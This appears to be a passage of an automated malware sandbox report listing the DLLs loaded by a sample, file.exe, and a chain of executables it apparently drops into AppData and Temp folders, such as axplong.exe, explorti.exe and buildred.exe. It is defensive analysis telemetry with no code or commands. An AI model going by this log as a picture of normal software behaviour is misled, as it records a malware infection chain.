Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
